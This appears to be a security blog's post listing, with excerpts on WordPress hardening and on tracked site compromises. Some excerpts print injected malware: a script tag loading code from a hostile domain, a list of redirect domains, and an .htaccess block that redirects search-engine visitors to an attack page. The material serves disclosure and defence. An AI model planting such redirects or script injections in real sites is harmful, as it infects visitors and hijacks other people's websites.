This post was put together in collaboration with one of our Support Engineers, Bruno Borges. Be sure to take a minute and say thanks for the info, he loves twitter (when its up). It seems every day we’re combating malicious redirections. Often, they are simple, but everyday they are evolving, and in some instances become [...]
How To: Lock Your Site by Enabling a Second Layer of Authentication
June 25, 2012 by
I put together a post this weekend about my personal experience installing a WordPress site on a clean Server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication. That got me thinking about a putting together this post which will [...]
How To: Stop The Hacker By Hardening WordPress
June 19, 2012 by
Every day we service 100′s of clients and the question is always asked: How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
Ugly htaccess
February 22, 2012 by
No need to comment: ##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!## RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] [...]
New Malware – sweepstakesandcontestsnow.com
September 19, 2011 by
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what is gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
.htaccess redirections to software-boss.ru and programmengineering.ru
August 8, 2011 by
Just an update to the .htaccess redirections attacks that we have been tracking for the last few days (most of them to .ru domains). Those are some of the domains being used right now: http://software-boss.ru/grammar/index.php additionalprofit.ru boss-united.ru clear-agent.ru clearagent.ru face-apple.ru fightagent.ru power-update.ru programmprofit.ru software-boss.ru syntaxswitch.ru window-switch.ru http://powerprogramm.ru/make/index.php http://jaobsofterty.ru/in.cgi?2 http://programmengineering.ru/check/index.php It is happening on [...]
Malware – htaccess redirection to sokoloperkovuske.com/in.php
July 21, 2011 by
Lots of people were asking us about some high profile sites that were hacked and getting redirected to http://sokoloperkovuske.com/in.php?pp=110 (including christwire.org and others). This attack was very simple and added the following code to the .htaccess file: <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuske.com/in.php?pp=110 [R,L] </IfModule> It basically [...]
